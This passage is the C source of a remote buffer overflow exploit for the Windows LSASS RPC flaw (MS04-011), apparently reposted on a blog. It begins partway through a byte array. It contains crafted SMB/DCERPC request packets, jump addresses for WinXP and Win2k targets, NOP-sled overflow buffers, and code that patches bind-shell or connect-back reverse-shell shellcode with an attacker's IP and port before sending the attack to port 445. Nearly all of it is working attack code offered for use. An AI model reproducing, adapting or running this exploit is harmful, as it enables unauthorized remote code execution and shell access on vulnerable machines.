="\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE""\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00""\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E""\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46""\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40""\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40""\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48""\x00\x4F\x00\x44\x00\x00\x81\x19\x6A\x7A\xF2\xE4\x49\x1C\x28\xAF""\x30\x25\x74\x10\x67\x53\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00""\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00""\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00""\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00""\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";char req4[] ="\x00\x00\x00\x5C\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE""\x00\x08\x30\x00\x04\xFF\x00\x5C\x00\x08\x00\x01\x00\x31\x00\x00""\x5C\x00\x5C\x00\x31\x00\x39\x00\x32\x00\x2E\x00\x31\x00\x36\x00""\x38\x00\x2E\x00\x31\x00\x2E\x00\x32\x00\x31\x00\x30\x00\x5C\x00""\x49\x00\x50\x00\x43\x00\x24""\x00\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";char req5[] ="\x00\x00\x00\x64\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04""\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x0E\x00\x16\x00\x00\x00""\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00""\x02\x00\x00\x00\x03\x11\x00\x00\x5C\x00\x6C\x00\x73\x00\x61\x00""\x72\x00\x70\x00\x63\x00\x00\x00";char req6[] ="\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04""\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x04\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02""\x00\x26\x00\x00\x40\x59\x00\x10\x5C\x00\x50\x00\x49\x00\x50\x00""\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00""\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00""\x01\x00\x00\x00\x00\x00\x01\x00\x6A\x28\x19\x39\x0C\xB1\xD0\x11""\x9B\xA8\x00\xC0\x4F\xD9\x2E\xF5\x00\x00\x00\x00\x04\x5D\x88\x8A""\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";char req7[] ="\x00\x00\x0C\xF4\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04""\x00\x08\x60\x00\x10\x00\x00\xA0\x0C\x00\x00\x00\x04\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\xA0\x0C\x54\x00\x02""\x00\x26\x00\x00\x40\xB1\x0C\x10\x5C\x00\x50\x00\x49\x00\x50\x00""\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x00\x03\x10\x00\x00\x00""\xA0\x0C\x00\x00\x01\x00\x00\x00\x88\x0C\x00\x00\x00\x00\x09\x00""\xEC\x03\x00\x00\x00\x00\x00\x00\xEC\x03\x00\x00";// room for shellcode here ...char shit1[] ="\x95\x14\x40\x00\x03\x00\x00\x00\x7C\x70\x40\x00\x01\x00\x00\x00""\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00""\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00""\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00""\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x7C\x70\x40\x00""\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00""\x7C\x70\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00""\x00\x00\x00\x00\x7C\x70\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00""\x01\x00\x00\x00\x00\x00\x00\x00\x78\x85\x13\x00\xAB\x5B\xA6\xE9";char req8[] ="\x00\x00\x10\xF8\xFF\x53\x4D\x42\x2F\x00\x00\x00\x00\x18\x07\xC8""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE""\x00\x08\x60\x00\x0E\xFF\x00\xDE\xDE\x00\x40\x00\x00\x00\x00\xFF""\xFF\xFF\xFF\x08\x00\xB8\x10\x00\x00\xB8\x10\x40\x00\x00\x00\x00""\x00\xB9\x10\xEE\x05\x00\x00\x01\x10\x00\x00\x00\xB8\x10\x00\x00""\x01\x00\x00\x00\x0C\x20\x00\x00\x00\x00\x09\x00\xAD\x0D\x00\x00""\x00\x00\x00\x00\xAD\x0D\x00\x00";// room for shellcode here ...char req9[] ="\x00\x00\x0F\xD8\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x18\x01""\x00\x08\x70\x00\x10\x00\x00\x84\x0F\x00\x00\x00\x04\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x84\x0F\x54\x00\x02""\x00\x26\x00\x00\x40\x95\x0F\x00\x5C\x00\x50\x00\x49\x00\x50\x00""\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x00\x02\x10\x00\x00\x00""\x84\x0F\x00\x00\x01\x00\x00\x00\x6C\x0F\x00\x00\x00\x00\x09\x00";char shit3[] ="\x00\x00\x00\x00\x9A\xA8\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00""\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00""\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00""\x01\x00\x00\x00""\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00""\x00\x00\x00\x00\x9A\xA8\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00""\x01\x00\x00\x00\x00\x00\x00\x00\x9A\xA8\x40\x00\x01\x00\x00\x00""\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x9A\xA8\x40\x00""\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00";#define LEN 3500#define BUFSIZE 2000#define NOP 0x90struct targets { int num; char name[50]; long jmpaddr;} ttarget[]= { { 0, "WinXP Professional [universal] lsass.exe ", 0x01004600 }, // jmp espaddr { 1, "Win2k Professional [universal] netrap.dll", 0x7515123c }, // jmp ebxaddr { 2, "Win2k Advanced Server [SP4] netrap.dll", 0x751c123c }, // jmp ebxaddr //{ 3, "reboot", 0xffffffff }, // crash { NULL }};void usage(char *prog){ int i; printf("Usage:\n\n"); printf("%s <target> <victim IP> <bindport> [connectback IP] [options]\n\n",prog); printf("Targets:\n"); for (i=0; i<3; i++) printf(" %d [0x%.8x]: %s\n", ttarget[i].num, ttarget[i].jmpaddr,ttarget[i].name); printf("\nOptions:\n"); printf(" -t: Detect remote OS:\n"); printf(" Windows 5.1 - WinXP\n"); printf(" Windows 5.0 - Win2k\n\n"); exit(0);}int main(int argc, char *argv[]){int i;int opt = 0;char *target;char hostipc[40];char hostipc2[40*2];unsigned short port;unsigned long ip;unsigned char *sc;char buf[LEN+1];char sendbuf[(LEN+1)*2];char req4u[sizeof(req4)+20];char screq[BUFSIZE+sizeof(req7)+1500+440];char screq2k[4348+4060];char screq2k2[4348+4060];char recvbuf[1600];char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";char strBuffer[BUFSIZE];unsigned int targetnum = 0;int len, sockfd;short dport = 445;struct hostent *he;struct sockaddr_in their_addr;char smblen;char unclen;WSADATA wsa; printf("\nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");if (argc < 4) { usage(argv[0]);}target = argv[2];sprintf((char *)hostipc,"\\\\%s\\ipc$", target); for (i=0; i<40; i++) { hostipc2[i*2] = hostipc[i]; hostipc2[i*2+1] = 0;}memcpy(req4u, req4, sizeof(req4)-1);memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);smblen = 52+(char)strlen(hostipc)*2;memcpy(req4u+3, &smblen, 1);unclen = 9 + (char)strlen(hostipc)*2;memcpy(req4u+45, &unclen, 1);if (argc > 4) if (!memcmp(argv[4], "-t", 2)) opt = 1;if ( (argc > 4) && !opt ) { port = htons(atoi(argv[3]))^(USHORT)0x9999; ip = inet_addr(argv[4])^(ULONG)0x99999999; memcpy(&reverseshell[118], &port, 2); memcpy(&reverseshell[111], &ip, 4); sc = reverseshell;} else { port = htons(atoi(argv[3]))^(USHORT)0x9999; memcpy(&bindshell[176], &port, 2); sc = bindshell;}if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "\x3c\x12\x15\x75", 4); memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4); memcpy(&buf[2036], sc, strlen(sc)); memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4); memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr memcpy(&buf[2856], sc, strlen(sc)); for (i=0; i<LEN; i++) { sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);} else { memset(strBuffer, NOP, BUFSIZE); memcpy(strBuffer+160, sc, strlen(sc)); memcpy(strBuffer+1980, strasm, strlen(strasm)); *(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr;}memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);WSAStartup(MAKEWORD(2,0),&wsa);if ((he=gethostbyname(argv[2])) == NULL) { // get the host info perror("[-] gethostbyname "); exit(1);}if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1);}their_addr.sin_family = AF_INET;their_addr.sin_port = htons(dport);their_addr.sin_addr = *((struct in_addr *)he->h_addr);memset(&(their_addr.sin_zero), '\0', 8);printf("[*] Target: IP: %s: OS: %s\n", argv[2], ttarget[atoi(argv[1])].name);printf("[*] Connecting to %s:445 ... ", argv[2]);if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1){ printf("\n[-] Sorry, cannot connect to %s:445. Try again...\n", argv[2]); exit(1);}printf("OK\n");if (send(sockfd, req1, sizeof(req1)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1);}len = recv(sockfd, recvbuf, 1600, 0);if (send(sockfd, req2, sizeof(req2)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1);}len = recv(sockfd, recvbuf, 1600, 0);if (send(sockfd, req3, sizeof(req3)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1);}len = recv(sockfd, recvbuf, 1600, 0);if ((argc > 5) || opt) { printf("[*] Detecting remote OS: "); for (i=0; i<12; i++) { printf("%c", recvbuf[48+i*2]); } printf("\n"); exit(0);}printf("[*] Attacking ... ");if (send(sockfd, req4u, smblen+4, 0) == -1) { printf("[-] Send failed\n"); exit(1);}len = recv(sockfd, recvbuf, 1600, 0);if (send(sockfd, req5, sizeof(req5)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1);}len = recv(sockfd, recvbuf, 1600, 0);if (send(sockfd, req6, sizeof(req6)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1);}len = recv(sockfd, recvbuf, 1600, 0);if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) { memcpy(screq2k, req8, sizeof(req8)-1); memcpy(screq2k+sizeof(req8)-1, sendbuf, (LEN+1)*2); memcpy(screq2k2, req9, sizeof(req9)-1); memcpy(screq2k2+sizeof(req9)-1, sendbuf+4348-sizeof(req8)+1, (LEN+1)*2-4348); memcpy(screq2k2+sizeof(req9)-1+(LEN+1)*2-4348-sizeof(req8)+1+206, shit3,sizeof(shit3)-1); if (send(sockfd, screq2k, 4348, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); if (send(sockfd, screq2k2, 4060, 0) == -1) { printf("[-] Send failed\n"); exit(1); }} else { memcpy(screq, req7, sizeof(req7)-1); memcpy(screq+sizeof(req7)-1, &strBuffer[0], BUFSIZE); memcpy(screq+sizeof(req7)-1+BUFSIZE, shit1, 9*16); screq[BUFSIZE+sizeof(req7)-1+1500-304-1] = 0; if (send(sockfd, screq, BUFSIZE+sizeof(req7)-1+1500-304, 0)== -1){ printf("[-] Send failed\n"); exit(1); }}printf("OK\n");len = recv(sockfd, recvbuf, 1600, 0);return 0;} More...Posted by windtear at 5:45 PM